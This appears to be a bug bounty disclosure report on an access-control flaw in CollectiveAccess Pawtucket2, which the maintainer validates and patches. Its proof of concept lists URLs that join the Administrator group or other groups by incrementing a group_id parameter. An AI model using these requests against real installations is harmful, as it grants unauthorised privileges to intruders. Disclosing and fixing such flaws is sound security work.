Improper Access Control in collectiveaccess/pawtucket2

Valid

Reported on

Sep 30th 2021

Description

An attacker can join any user group in the Pawtucket2 interface as the URLs are not being randomised

Proof of Concept

Any attacker can join the Administrator group using: http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/2

An attacker can join any group by incrementing the number by 1:

http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/1
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/3
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/4

Impact

This vulnerability is capable of allowing attackers to join Administrator group and other groups without being invited, bypassing access controls.

Recommended Fix

Use randomized ids in user group creation and access

We have contacted a member of the collectiveaccess/pawtucket2 team and are waiting to hear back 2 years ago
haxatron modified the report
2 years ago
haxatron modified the report
2 years ago
haxatron modified the report
2 years ago
CollectiveAccess validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess
2 years ago

Maintainer

This one is less useful than one might expect, but it should not be like this. Will patch shortly.

CollectiveAccess
2 years ago

Maintainer

Thank you for pointing it out.

CollectiveAccess marked this as fixed with commit 6c0e8a 2 years ago
CollectiveAccess has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation